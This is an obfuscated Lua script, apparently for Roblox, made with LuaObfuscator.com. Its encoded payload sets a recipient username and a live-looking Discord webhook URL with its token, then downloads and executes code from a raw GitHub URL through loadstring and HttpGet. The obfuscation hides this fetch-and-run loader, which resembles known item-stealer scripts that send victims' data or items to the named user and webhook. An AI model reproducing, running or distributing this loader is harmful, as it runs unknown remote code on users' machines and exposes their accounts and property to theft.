--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v87=v5(v81,v19);v19=nil;return v87;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -((2494 -(1523 + 114)) + 74)))) ;return v82-(v82%(569 -(367 + 201))) ;else local v83=(929 -(214 + 641 + 72))^(v32-1) ;return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (2 -0) ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + (0 -0) ;return (v40 * (3720433 + 13056783)) + (v39 * (66493 -((1637 -745) + 65))) + (v38 * (610 -354)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=351 -(87 + 263) ;local v44=(v20(v42,181 -(67 + 113) ,15 + 5 ) * ((4 -(793 -(368 + 423)))^(24 + 8))) + v41 ;local v45=v20(v42,83 -62 ,31);local v46=((v20(v42,(3092 -2108) -(802 + 150) )==(2 -1)) and  -(1 -(18 -(10 + 8)))) or (1 + 0) ;if (v45==((3835 -2838) -(915 + 82))) then if (v44==(0 -0)) then return v46 * 0 ;else local v88=(442 -(416 + 26)) + 0 ;while true do if (v88==(0 -0)) then v45=1188 -(1069 + 118) ;v43=(0 -0) -0 ;break;end end end elseif (v45==(4477 -2430)) then return ((v44==(0 + 0)) and (v46 * ((1 -(0 + 0))/(0 + (0 -0))))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/(2^52))) ;end local function v25(v47)local v48=438 -(145 + 293) ;local v49;local v50;while true do if (v48==(431 -(44 + 386))) then v49=v3(v16,v18,(v18 + v47) -(1487 -(998 + 488)) );v18=v18 + v47 ;v48=1 + 1 ;end if (2==v48) then v50={};for v89=1 + 0 , #v49 do v50[v89]=v2(v1(v3(v49,v89,v89)));end v48=775 -((713 -512) + 571) ;end if (v48==(1138 -((975 -(814 + 45)) + 1022))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=1 + 0 ;end if (v48==(10 -7)) then return v6(v50);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((8 -4)~=v51) then else while true do if (v52~=2) then else local v95=0;while true do if (v95==(0 + 0)) then local v100=0 -0 ;while true do if (v100~=(1467 -(899 + 568))) then else v57=nil;v58=nil;v100=1 + 0 ;end if (v100~=(2 -1)) then else v95=604 -(268 + 335) ;break;end end end if (v95==(291 -(60 + 230))) then v52=6 -3 ;break;end end end if (v52==(575 -(426 + 146))) then v59=nil;while true do local v99=0;while true do if (v99==1) then if (v53==(1 + 1)) then local v129=0;local v130;while true do if (v129~=0) then else v130=1456 -(282 + 1174) ;while true do if (v130~=(811 -(569 + 242))) then else for v158=2 -1 ,v58 do local v159=1130 -(369 + 761) ;local v160;local v161;local v162;while true do if ((0 + 0)==v159) then v160=1024 -(706 + 318) ;v161=nil;v159=1252 -(721 + 530) ;end if (v159~=(1272 -(945 + 326))) then else v162=nil;while true do if (v160~=(0 -0)) then else local v176=0;local v177;while true do if (v176==(0 -0)) then v177=0 + 0 ;while true do if (v177==(700 -(271 + 429))) then local v185=0 + 0 ;while true do if (v185==1) then v177=1;break;end if (v185==(1500 -(1408 + 92))) then v161=v21();v162=nil;v185=1;end end end if (v177==(1087 -(461 + 625))) then v160=1289 -(993 + 295) ;break;end end break;end end end if (v160~=1) then else if (v161==(1 + 0)) then v162=v21()~=(1171 -(418 + 753)) ;elseif (v161==(338 -(144 + 192))) then v162=v24();elseif (v161~=(2 + 1)) then else v162=v25();end v59[v158]=v162;break;end end break;end end end v57[219 -(42 + 174) ]=v21();v130=1;end if ((1 + 0)~=v130) then else for v163=1 + 0 ,v23() do local v164=0;local v165;while true do if (v164==(0 + 0)) then v165=v21();if (v20(v165,1,1 + 0 )==0) then local v171=0 + 0 ;local v172;local v173;local v174;local v175;while true do if (v171~=(530 -(406 + 123))) then else v174=nil;v175=nil;v171=2;end if ((1771 -(1749 + 20))~=v171) then else while true do if (v172==(1506 -(363 + 1141))) then local v181=0 + 0 ;while true do if (v181~=0) then else if (v20(v174,1323 -(1249 + 73) ,2 -1 )==1) then v175[2 + 0 ]=v59[v175[1 + 1 ]];end if (v20(v174,1147 -(466 + 679) ,2 + 0 )~=(2 -1)) then else v175[1936 -(565 + 1368) ]=v59[v175[3]];end v181=2 -1 ;end if (1~=v181) then else v172=3;break;end end end if (v172==(8 -5)) then if (v20(v174,3,11 -8 )==1) then v175[1665 -(1477 + 184) ]=v59[v175[5 -1 ]];end v54[v163]=v175;break;end if (v172~=(1 + 0)) then else local v183=0;while true do if ((1901 -(106 + 1794))==v183) then v172=858 -(564 + 292) ;break;end if (v183~=(0 -0)) then else v175={v22(),v22(),nil,nil};if (v173==(476 -(41 + 435))) then local v194=0 -0 ;local v195;local v196;while true do if (v194==0) then v195=114 -(4 + 110) ;v196=nil;v194=585 -(57 + 527) ;end if (v194==(1428 -(41 + 1386))) then while true do if ((103 -(17 + 86))==v195) then v196=0 + 0 ;while true do if (v196==(1613 -(1565 + 48))) then v175[3 + 0 ]=v22();v175[8 -4 ]=v22();break;end end break;end end break;end end elseif (v173==1) then v175[1141 -(782 + 356) ]=v23();elseif (v173==(269 -(176 + 91))) then v175[8 -5 ]=v23() -(2^(182 -(122 + 44))) ;elseif (v173==3) then local v199=0;local v200;while true do if (v199==(0 -0)) then v200=1092 -(975 + 117) ;while true do if (v200~=(0 -0)) then else v175[3 + 0 ]=v23() -((6 -4)^16) ;v175[4 + 0 ]=v22();break;end end break;end end end v183=1 + 0 ;end end end if ((1018 -(697 + 321))~=v172) then else v173=v20(v165,3 -1 ,68 -(30 + 35) );v174=v20(v165,4,5 + 1 );v172=1 -0 ;end end break;end if ((1257 -(1043 + 214))==v171) then v172=0 -0 ;v173=nil;v171=1213 -(323 + 889) ;end end end break;end end end v53=5 -2 ;break;end end break;end end end if (v53~=(0 -0)) then else local v131=580 -(361 + 219) ;local v132;local v133;while true do if (v131==(321 -(53 + 267))) then while true do if (v132~=(0 -0)) then else v133=1227 -(322 + 905) ;while true do if (v133==1) then v56={};v53=1 + 0 ;break;end if (v133==(413 -(15 + 398))) then local v166=982 -(18 + 964) ;while true do if (v166==(612 -(602 + 9))) then v133=1;break;end if (v166==(1189 -(449 + 740))) then v54={};v55={};v166=1;end end end end break;end end break;end if (v131==0) then v132=872 -(826 + 46) ;v133=nil;v131=3 -2 ;end end end break;end if (v99~=0) then else local v102=0 + 0 ;local v103;while true do if (v102~=(0 + 0)) then else v103=947 -(245 + 702) ;while true do if (v103==(0 -0)) then local v156=0;while true do if (v156~=0) then else if (v53~=(853 -(20 + 830))) then else local v167=0 + 0 ;local v168;while true do if (v167==(0 + 0)) then v168=126 -(116 + 10) ;while true do if (v168==0) then local v179=1898 -(260 + 1638) ;while true do if (v179==0) then local v184=440 -(382 + 58) ;while true do if (0==v184) then for v188=1,v23() do v55[v188-(1 + 0) ]=v28();end return v57;end end end end end end break;end end end if (v53==(739 -(542 + 196))) then local v169=0 + 0 ;local v170;while true do if (v169~=(0 -0)) then else v170=0 -0 ;while true do if (v170~=1) then else v59={};v53=1207 -(902 + 303) ;break;end if (0==v170) then local v180=0 + 0 ;while true do if (v180==1) then v170=1;break;end if (v180~=(0 + 0)) then else v57={v54,v55,nil,v56};v58=v23();v180=1;end end end end break;end end end v156=2 -1 ;end if (v156==(1552 -(1126 + 425))) then v103=406 -(118 + 287) ;break;end end end if (v103==(3 -2)) then v99=1122 -(118 + 1003) ;break;end end break;end end end end end break;end if (v52==(683 -(483 + 200))) then local v96=0 -0 ;while true do if (v96~=(377 -(142 + 235))) then else local v101=0 -0 ;while true do if (v101~=(1 + 0)) then else v96=563 -(334 + 228) ;break;end if (v101==0) then v53=977 -(553 + 424) ;v54=nil;v101=2 -1 ;end end end if (v96~=(1 -0)) then else v52=1 + 0 ;break;end end end if (v52==1) then local v97=0 + 0 ;local v98;while true do if (0==v97) then v98=236 -(141 + 95) ;while true do if (v98==0) then local v134=0 + 0 ;while true do if (v134==0) then v55=nil;v56=nil;v134=1 + 0 ;end if (v134==(2 -1)) then v98=1 + 0 ;break;end end end if (v98==(1 + 0)) then v52=2 + 0 ;break;end end break;end end end end break;end if ((2 -1)==v51) then v54=nil;v55=nil;v51=5 -3 ;end if (v51==3) then v58=nil;v59=nil;v51=4;end if (v51==(0 + 0)) then v52=0 -0 ;v53=nil;v51=1;end if ((1 + 1)==v51) then v56=nil;v57=nil;v51=3;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v84=0,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + 1 ];else v76[v84]=v73[v84 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=8) then if (v79<=3) then if (v79<=1) then if (v79==0) then v76[v78[2]]();else local v104=v78[2];v76[v104]=v76[v104](v13(v76,v104 + 1 ,v71));end elseif (v79>2) then v76[v78[2]]=v78[3];else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=5) then if (v79==4) then v76[v78[2]]=v78[3];else local v111=0;local v112;local v113;while true do if (v111==0) then v112=v78[2];v113=v76[v78[3]];v111=1;end if (v111==1) then v76[v112 + 1 ]=v113;v76[v112]=v113[v78[4]];break;end end end elseif (v79<=6) then v76[v78[2]]=v62[v78[3]];elseif (v79>7) then v76[v78[2]]=v62[v78[3]];else v76[v78[2]]();end elseif (v79<=12) then if (v79<=10) then if (v79>9) then v76[v78[2]]=v78[3]~=0 ;else v76[v78[2]][v78[3]]=v78[4];end elseif (v79>11) then do return;end else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=14) then if (v79>13) then local v121=v78[2];local v122,v123=v69(v76[v121](v13(v76,v121 + 1 ,v78[3])));v71=(v123 + v121) -1 ;local v124=0;for v127=v121,v71 do local v128=0;while true do if (v128==0) then v124=v124 + 1 ;v76[v127]=v122[v124];break;end end end else local v125=v78[2];v76[v125]=v76[v125](v13(v76,v125 + 1 ,v71));end elseif (v79<=15) then do return;end elseif (v79==16) then local v137=v78[2];local v138,v139=v69(v76[v137](v13(v76,v137 + 1 ,v78[3])));v71=(v139 + v137) -1 ;local v140=0;for v151=v137,v71 do v140=v140 + 1 ;v76[v151]=v138[v140];end else local v141=v78[2];local v142=v76[v78[3]];v76[v141 + 1 ]=v142;v76[v141]=v142[v78[4]];end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365724E616D65030A3O0054756265422O535F595403093O00557365724E616D653203013O002003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132313935383435392O38323039383732382F49646F624E3468486E434C547A58735376724A51557A66315A443235453038644B67744B79542D4557494A664871447044492O707A71644749787A644F56727779764539030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012083O00013O00300B3O000200030012083O00013O00300B3O000400050012083O00013O00300B3O000600070012083O00083O001208000100093O00201100010001000A0012030003000B4O0002000400014O000E000100044O000D5O00026O000100012O000F3O00017O00",v9(),...);end
